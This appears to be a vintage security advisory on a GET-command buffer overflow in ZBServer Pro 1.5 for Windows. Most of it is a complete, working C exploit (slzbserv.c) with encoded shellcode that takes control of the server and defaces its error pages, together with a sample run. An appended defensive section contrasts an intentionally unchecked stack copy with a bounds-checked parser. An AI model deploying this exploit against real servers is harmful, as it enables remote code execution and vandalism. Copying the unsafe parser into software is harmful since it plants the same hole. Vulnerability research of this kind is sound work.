COMMAND
ZBServer
SYSTEMS AFFECTED
ZBServer 1.5 Pro Edition for Win98/NT and possibly other versions
PROBLEM
USSR Labs found the following. ZBServer Pro Edition is a
full-featured Internet/Intranet server software package that
includes HTTP (web), Gopher, FTP and Chat Services. Fast,
inexpensive and easy-to-use, ZBServer Pro is small enough to run
in the background of your Windows 95 or NT computer to provide
users with full or restricted access to files, graphics, sounds
or movies. ZBServer Pro can provide organizations of all sizes
enterprise-wide web service to internal and external TCP/IP
network users.
USSR Labs found a local/remote buffer overflow. The code that
handles GET commands has an unchecked buffer that will allow
arbitrary code to be executed if it is overflowed.
For binary or source of this exploit go to:
http://www.ussrback.com/
Mimed source follows:
|Zan added following. USSRBACK found a buffer overflow in
ZBServer (GET command). Well, it is an exploit tested on WinNT
4.0 (Spanish version). It comes back with a raw eip in code (not
jumps against "call register" or "jmp register"). If you want a
real portable exploit you can replace the last four bytes with a
call edi + x where x > 10 bytes.
ZBServer PRO's WebServer has an overflow in "get command". It
can't handle an excessively long request. When the string has a
length of about 766 bytes it crashes. The stack is overwritten.
|Zan exploited and finished his exploit for WinNT and it's
attached with this advisory. Arbitrary code can run with
webserver privileges. The Win9x version can't be exploited with a
clear environment. If you have a default debugger configuration
or your processes are handled by a special process hooking errors
and exceptions then it can be exploited too but it won't be the
common scenario. The Win9x version can't run arbitrary code with a
clear environment but a DoS attack is possible. You can crash
the service with a local/remote request.
ZBServer PRO 1.50-r1x exploit gets remote server's full control.
When you attack a vulnerable server you can run arbitrary code
inside. Firstly, sploit creates an advisory file. It's
information for administrative use. Later, exploit restores and
kills the overflowed thread but before it patches some error
information so all error pages will appear like hacked pages. If
you have problems running ZBServer they can be with your return
address (remember that tests ran against WinNT sp5 Spanish
version). One could jump against edi register + 5 (more portable)
but we will have a static dll address dependence. Well, it wasn't
a clear jump so |Zan decided to implement the first technique but
the second is possible too. Example:
% lynx http://xxx.xxx.xxx.xxx
WELCOME TO ... blah ... blah ..... (It's the root page)
% lynx xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html
FILE NOT FOUND The request object (/ServerAbusedbyiZan.html) was
not found.
% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html
FILE NOT FOUND The request object (/FileNotAvailable.html) was not
found.
$ zbsploit xxx.xxx.xxx.xxx
WinNT 4.0 sp5 ZBServer 1.50-r1x exploit http://mareasvivas.cjb.net -
http://www.deepzone.org
Coded by -=[|Zan]=- izan@galaxycorp.com - izan@deepzone.org
done.
$ lynx http://xxx.xxx.xxx.xxx
WELCOME TO ... blah ... blah ..... (It's the root page again)
% lynx http://xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html
Hello. You are running a ZBServer PRO's buggy version and
you have been abused.
More information can be downloaded from
http://www.deepzone.org or http://mareasvivas.cjb.net
regards to DeepZone crew (TheWizard, ^Anuska^ and Nemo)
Coded by |Zan.
% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html
Server hacked.
http://www.deepzone.org Sploit coded by |Zan
%_
Here is the exploit:
/** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT)
**
** ZBServer PRO 1.50-r1x exploit gets remote server's full control.
** When you attack a vulnerable server you can run arbitrary code
** inside. Firstly, sploit creates an advisory file. It's information
** for administrative use. Later, exploit restores and kills the
** overflowed thread but before it patches some error information so
** all error pages will appear like hacked pages.
**
** Compile on Debian with kernel 2.2.12: gcc -o slzbserv slzbserv.c
** run: ./slzbserv hostname
**
** http://mareasvivas.cjb.net / http://www.deepzone.org
**
** Coded by |Zan | izan@galaxycorp.com
**
**/
#include <stdio.h>
#include <stdlib.h>      /* exit() */
#include <string.h>      /* memcpy() */
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>
#define _PORT 80         /* ZBServer HTTP service */
#define _TamBuf 770      /* bytes of crash[] sent; equals sizeof(crash) - 1 */
char crash[] =
"GET /"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"
"\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"
"\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"
"\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"
"\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"
"\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"
"\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"
"\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"
"\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"
"\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"
"\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"
"\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"
"\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"
"\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"
"\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"
"\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"
"\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"
"\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"
"\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"
"\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"
"\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"
"\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"
"\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"
"\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"
"\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"
"\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"
"\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"
"\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"
"\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"
"\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"
"\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"
"\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"
"\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"
"\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"
"\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"
"\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"
"\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"
"\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"
"\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"
"\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"
"\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"
"\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"
"\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";
int sock;
struct sockaddr_in sock_a;
struct hostent *host;

int main(int argc, char *argv[]) {
    printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n");
    printf("http://mareasvivas.cjb.net - http://www.deepzone.org\n\n");
    printf("Coded by -=[ |Zan ]=- izan@galaxycorp.com - izan@deepzone.org\n\n");
    if (argc < 2) {
        fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
        exit(0);
    }
    if ((host = gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname");
        exit(-1);
    }
    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("create socket");
        exit(-1);
    }
    sock_a.sin_family = AF_INET;
    sock_a.sin_port = htons(_PORT);
    memcpy((char *)&sock_a.sin_addr, (char *)host->h_addr, host->h_length);
    if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)) != 0) {
        perror("create connect");
        exit(-1);
    }
    fflush(stdout);
    write(sock, crash, _TamBuf);    /* the 770-byte GET request described above */
    write(sock, "\n\n", 2);         /* terminate the request line and headers */
    printf("done.\n\n");
    close(sock);
    return 0;
}
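A defensive illustration added here, not ZBServer's code or |Zan's: the defect class behind the exploit above, a GET request target copied into a fixed-size stack buffer with no length check, beside a bounds-checked parser that refuses a target of the size the advisory reports (about 766 bytes) instead of overflowing. The buffer size (512) and the exact request layout are assumptions; the advisory only states that the GET handler's buffer is unchecked.

```c
#include <string.h>

#define TARGET_MAX 512   /* assumed size of the server's target buffer */

/* Unsafe pattern: the target is copied into a fixed stack buffer with no
 * check that it fits; a target of TARGET_MAX bytes or more overwrites what
 * follows the buffer (saved registers, return address).  Short input only. */
int parse_target_unsafe(const char *request_line)
{
    char target[TARGET_MAX];
    const char *p = request_line + 4;         /* skip "GET " */
    size_t n = strcspn(p, " \r\n");           /* target ends at SP or EOL */
    memcpy(target, p, n);                     /* missing: n < TARGET_MAX check */
    target[n] = '\0';
    return (int)n;
}

/* Hardened version: validate the method, measure the target and refuse one
 * that will not fit, rejecting rather than silently truncating it. */
int parse_target_safe(const char *request_line, char *out, size_t out_size)
{
    if (strncmp(request_line, "GET ", 4) != 0)
        return -1;
    const char *start = request_line + 4;
    size_t len = strcspn(start, " \r\n");
    if (len == 0 || len >= out_size)
        return -1;
    memcpy(out, start, len);
    out[len] = '\0';
    return (int)len;
}

/* Same check against a TARGET_MAX-sized buffer; returns length or -1. */
int safe_target_length(const char *request_line)
{
    char out[TARGET_MAX];
    return parse_target_safe(request_line, out, sizeof out);
}

/* Constructed request whose target is 766 bytes, the size the advisory
 * reports as fatal; returns 1 when the hardened parser refuses it. */
int oversized_request_rejected(void)
{
    char request[1024];
    memcpy(request, "GET /", 5);
    memset(request + 5, 'A', 765);            /* "/" + 765 'A' = 766-byte target */
    memcpy(request + 770, " HTTP/1.0\r\n", 12); /* 12 includes the NUL */
    return safe_target_length(request) == -1;
}
```

The unsafe parser is kept only for comparison and is never fed a long target; the hardened one returns -1 for the 766-byte request, the point at which the advisory says the real server overwrites its stack.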
SOLUTION
Nothing yet.